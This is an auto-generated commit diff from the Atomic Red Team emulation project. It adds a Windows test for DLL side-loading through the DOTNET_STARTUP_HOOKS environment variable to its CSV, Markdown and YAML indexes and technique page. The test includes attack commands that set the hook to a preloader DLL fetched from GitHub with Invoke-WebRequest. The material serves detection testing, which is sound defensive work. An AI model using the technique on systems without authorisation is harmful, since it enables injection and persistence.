Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -398,6 +398,7 @@ defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-4
 defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
 defense-evasion,T1550.002,Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
 defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+defense-evasion,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
 defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt
 defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt
 defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt
@@ -564,6 +565,7 @@ privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file,
 privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
 privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
 privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+privilege-escalation,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
 privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 privilege-escalation,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
 privilege-escalation,T1053.002,At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
@@ -795,6 +797,7 @@ persistence,T1543.002,Systemd Service,2,"Create Systemd Service file,  Enable th
 persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
 persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
 persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+persistence,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
 persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 persistence,T1137.002,Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt
 persistence,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -291,6 +291,7 @@ defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-4
 defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
 defense-evasion,T1550.002,Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
 defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+defense-evasion,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
 defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt
 defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt
 defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt
@@ -411,6 +412,7 @@ privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of
 privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
 privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+privilege-escalation,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
 privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 privilege-escalation,T1053.002,At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
@@ -574,6 +576,7 @@ persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),af
 persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
 persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+persistence,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
 persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 persistence,T1137.002,Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt
 persistence,T1053.002,At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -590,6 +590,7 @@
   - Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
 - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
   - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
+  - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
 - T1126 Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -895,6 +896,7 @@
   - Atomic Test #2: Re-Opened Applications [macos]
 - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
   - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
+  - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
 - T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md)
@@ -1347,6 +1349,7 @@
   - Atomic Test #2: Re-Opened Applications [macos]
 - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
   - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
+  - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
 - T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1084 Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -440,6 +440,7 @@
   - Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
 - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
   - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
+  - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
 - T1126 Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -658,6 +659,7 @@
 - T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
   - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
+  - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
 - [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md)
   - Atomic Test #1: Logon Scripts [windows]
 - T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -974,6 +976,7 @@
 - T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
   - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
+  - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
 - T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1084 Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md)

atomics/Indexes/index.yaml

@@ -24249,6 +24249,55 @@ defense-evasion:
         command: "#{gup_executable}\n"
         cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
 
+          '
+        name: command_prompt
+    - name: DLL Side-Loading using the dotnet startup hook environment variable
+      auto_generated_guid: d322cdd7-7d60-46e3-9111-648848da7c02
+      description: 'Utilizing the dotnet_startup_hooks environment variable, this
+        method allows for registering a global method in an assembly that will be
+        executed whenever a .net core application is started. This unlocks a whole
+        range of scenarios, from injecting a profiler to tweaking a static context
+        in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1)
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        process_name:
+          description: Name of the created process
+          type: String
+          default: calculator.exe
+        preloader_dll:
+          description: library for interfacing with the dotnet framework
+          type: Path
+          default: PathToAtomicsFolder\T1574.002\bin\preloader
+      dependency_executor_name: powershell
+      dependencies:
+      - description: ".Net SDK must be installed\n"
+        prereq_command: 'if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit
+          0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null
+          echo.
+      - description: 'preloader must exist
+
+          '
+        prereq_command: 'if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/preloader?raw=true"
+          -OutFile "#{preloader_dll}"
+
+          '
+      executor:
+        command: |
+          set DOTNET_STARTUP_HOOKS=#{preloader_dll}
+          dotnet -h > nul
+          echo.
+        cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
+
           '
         name: command_prompt
   T1126:
@@ -39454,6 +39503,55 @@ privilege-escalation:
         command: "#{gup_executable}\n"
         cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
 
+          '
+        name: command_prompt
+    - name: DLL Side-Loading using the dotnet startup hook environment variable
+      auto_generated_guid: d322cdd7-7d60-46e3-9111-648848da7c02
+      description: 'Utilizing the dotnet_startup_hooks environment variable, this
+        method allows for registering a global method in an assembly that will be
+        executed whenever a .net core application is started. This unlocks a whole
+        range of scenarios, from injecting a profiler to tweaking a static context
+        in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1)
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        process_name:
+          description: Name of the created process
+          type: String
+          default: calculator.exe
+        preloader_dll:
+          description: library for interfacing with the dotnet framework
+          type: Path
+          default: PathToAtomicsFolder\T1574.002\bin\preloader
+      dependency_executor_name: powershell
+      dependencies:
+      - description: ".Net SDK must be installed\n"
+        prereq_command: 'if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit
+          0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null
+          echo.
+      - description: 'preloader must exist
+
+          '
+        prereq_command: 'if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/preloader?raw=true"
+          -OutFile "#{preloader_dll}"
+
+          '
+      executor:
+        command: |
+          set DOTNET_STARTUP_HOOKS=#{preloader_dll}
+          dotnet -h > nul
+          echo.
+        cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
+
           '
         name: command_prompt
   T1160:
@@ -61959,6 +62057,55 @@ persistence:
         command: "#{gup_executable}\n"
         cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
 
+          '
+        name: command_prompt
+    - name: DLL Side-Loading using the dotnet startup hook environment variable
+      auto_generated_guid: d322cdd7-7d60-46e3-9111-648848da7c02
+      description: 'Utilizing the dotnet_startup_hooks environment variable, this
+        method allows for registering a global method in an assembly that will be
+        executed whenever a .net core application is started. This unlocks a whole
+        range of scenarios, from injecting a profiler to tweaking a static context
+        in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1)
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        process_name:
+          description: Name of the created process
+          type: String
+          default: calculator.exe
+        preloader_dll:
+          description: library for interfacing with the dotnet framework
+          type: Path
+          default: PathToAtomicsFolder\T1574.002\bin\preloader
+      dependency_executor_name: powershell
+      dependencies:
+      - description: ".Net SDK must be installed\n"
+        prereq_command: 'if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit
+          0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null
+          echo.
+      - description: 'preloader must exist
+
+          '
+        prereq_command: 'if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/preloader?raw=true"
+          -OutFile "#{preloader_dll}"
+
+          '
+      executor:
+        command: |
+          set DOTNET_STARTUP_HOOKS=#{preloader_dll}
+          dotnet -h > nul
+          echo.
+        cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
+
           '
         name: command_prompt
   T1098.002:

atomics/T1574.002/T1574.002.md

@@ -8,6 +8,8 @@ Side-loading takes advantage of the DLL search order used by the loader by posit
 
 - [Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary](#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary)
 
+- [Atomic Test #2 - DLL Side-Loading using the dotnet startup hook environment variable](#atomic-test-2---dll-side-loading-using-the-dotnet-startup-hook-environment-variable)
+
 
 <br/>
 
@@ -60,4 +62,66 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/at
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - DLL Side-Loading using the dotnet startup hook environment variable
+Utilizing the dotnet_startup_hooks environment variable, this method allows for registering a global method in an assembly that will be executed whenever a .net core application is started. This unlocks a whole range of scenarios, from injecting a profiler to tweaking a static context in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d322cdd7-7d60-46e3-9111-648848da7c02
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| process_name | Name of the created process | String | calculator.exe|
+| preloader_dll | library for interfacing with the dotnet framework | Path | PathToAtomicsFolder&#92;T1574.002&#92;bin&#92;preloader|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+set DOTNET_STARTUP_HOOKS=#{preloader_dll}
+dotnet -h > nul
+echo.
+```
+
+#### Cleanup Commands:
+```cmd
+taskkill /F /IM #{process_name} >nul 2>&1
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: .Net SDK must be installed
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null
+echo.
+```
+##### Description: preloader must exist
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/preloader?raw=true" -OutFile "#{preloader_dll}"
+```
+
+
+
+
 <br/>